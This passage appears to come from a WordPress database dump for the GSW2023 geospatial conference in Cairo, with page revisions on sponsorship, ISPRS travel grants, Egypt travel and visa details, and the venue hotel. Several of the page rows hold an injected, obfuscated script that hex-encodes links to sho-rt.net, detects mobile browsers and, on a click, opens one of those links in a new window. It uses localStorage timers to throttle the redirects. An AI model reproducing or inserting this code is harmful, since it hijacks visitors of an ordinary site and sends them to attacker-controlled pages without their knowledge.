_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2022-11-11 15:17:15','2022-11-11 15:17:15','',2920,'https://gsw2023.com/?p=3279',0,'revision','',0),
(3280,1,'2022-11-11 15:20:54','2022-11-11 15:20:54','[vc_row][vc_column][bsf-info-box icon_size=\"32\"]\r\n<div class=\"three_quarter first\">\r\n<ul class=\"nospace\">\r\n 	<li style=\"text-align: justify;\"><strong>The <a href=\"http://www.isprs.org/foundation/Default.aspx\" target=\"_blank\" rel=\"noopener\"> ISPRS Foundation</a></strong>\r\n<strong>provides travel grants to enable young authors, distinguished speakers, and officially designated Delegates, especially from developing countries, to participate in ISPRS sponsored events and in forums promoting international cooperation, advancements and benefits of the P&amp;RS&amp;SI sciences.</strong></li>\r\n</ul>\r\n<div class=\"gap-10\"></div>\r\n<ul class=\"nospace\">\r\n 	<li style=\"list-style-type: none;\">\r\n<ul class=\"nospace\">\r\n 	<li style=\"text-align: justify;\"><strong>Click <a href=\"http://www.isprs.org/foundation/forms/Travel_Grants.aspx\" target=\"_blank\" rel=\"noopener\"> here</a></strong>\r\n<strong>to complete your travel grant application online</strong></li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<div class=\"gap-10\"></div>\r\n<ul class=\"nospace\">\r\n 	<li style=\"list-style-type: none;\">\r\n<ul class=\"nospace\">\r\n 	<li><strong>Deadline for applications is March 10, 2023. Successful applicants will be notified by March 24, 2023.</strong></li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<div class=\"gap-50\"></div>\r\n<div id=\"respond\"></div>\r\n</div>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','TRAVEL GRANTS','','inherit','closed','closed','','2665-revision-v1','','','2022-11-11 15:20:54','2022-11-11 15:20:54','',2665,'https://gsw2023.com/?p=3280',0,'revision','',0),
(3281,1,'2022-11-11 15:32:02','2022-11-11 15:32:02','','1-Cairo Tower','','inherit','open','closed','','1-cairo-tower','','','2022-11-11 15:32:02','2022-11-11 15:32:02','',2665,'https://gsw2023.com/wp-content/uploads/2022/11/1-Cairo-Tower.jpg',0,'attachment','image/jpeg',0),
(3282,1,'2022-11-11 15:59:03','2022-11-11 15:59:03','','360_F_71897150_qIJGwaXp01Kp2AwBpxQSzOcAyPbK0vVh','','inherit','open','closed','','360_f_71897150_qijgwaxp01kp2awbpxqszocaypbk0vvh','','','2022-11-11 15:59:03','2022-11-11 15:59:03','',2665,'https://gsw2023.com/wp-content/uploads/2022/11/360_F_71897150_qIJGwaXp01Kp2AwBpxQSzOcAyPbK0vVh.jpg',0,'attachment','image/jpeg',0),
(3283,1,'2022-11-11 16:07:30','2022-11-11 16:07:30','','1664433062169','','inherit','open','closed','','1664433062169','','','2022-11-11 16:07:30','2022-11-11 16:07:30','',2675,'https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg',0,'attachment','image/jpeg',0),
(3284,1,'2022-11-11 16:07:51','2022-11-11 16:07:51','[vc_row][vc_column][vc_column_text]\r\n<p style=\"color: red;\"><strong>Entry Visa:</strong></p>\r\n\r\n<ul>\r\n 	<li>\r\n<h6><strong>-Can be obtained at the Cairo International Airport upon arrival</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>-Cost of the Visa: Tourist: US$15 (single- or multiple-entry)</strong></h6>\r\n</li>\r\n</ul>\r\n<p style=\"color: red;\"><strong>Weather: <a style=\"color: black;\">in September: Around 30 degree in Cairo</a></strong></p>\r\n\r\n<ul>\r\n 	<li>\r\n<h6><strong>Cairo is reachable from over 70 countries through Egypt Air and Star Alliance members. The local organizing committee will apply to Star Alliance Convention Plus for additional discount on air tickets and a code will be provided to registered members</strong></h6>\r\n</li>\r\n</ul>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Travel To Egypt','','inherit','closed','closed','','2675-revision-v1','','','2022-11-11 16:07:51','2022-11-11 16:07:51','',2675,'https://gsw2023.com/?p=3284',0,'revision','',0),
(3285,1,'2022-11-11 16:10:04','2022-11-11 16:10:04','','slide9','','inherit','open','closed','','slide9','','','2022-11-11 16:10:04','2022-11-11 16:10:04','',2675,'https://gsw2023.com/wp-content/uploads/2022/11/slide9.jpg',0,'attachment','image/jpeg',0),
(3286,1,'2022-11-11 16:13:13','2022-11-11 16:13:13','','slide92','','inherit','open','closed','','slide92','','','2022-11-11 16:13:13','2022-11-11 16:13:13','',2675,'https://gsw2023.com/wp-content/uploads/2022/11/slide92.jpg',0,'attachment','image/jpeg',0),
(3287,1,'2022-11-11 16:15:16','2022-11-11 16:15:16','','intercontinental-cairo-7836282477-2x1','','inherit','open','closed','','intercontinental-cairo-7836282477-2x1','','','2022-11-11 16:15:16','2022-11-11 16:15:16','',2679,'https://gsw2023.com/wp-content/uploads/2022/11/intercontinental-cairo-7836282477-2x1-1.jpg',0,'attachment','image/jpeg',0),
(3288,1,'2022-11-11 16:15:41','2022-11-11 16:15:41','[vc_row][vc_column][vc_column_text]\r\n<div class=\"three_quarter first\"><section class=\"clear\"><strong><a>GSW2023 will take place at the INTERCONTINENTAL CAIRO SEMIRAMIS </a></strong></section>\r\n<ul>\r\n 	<li style=\"text-align: justify;\">\r\n<h6><strong>On the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. The conference venue hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and 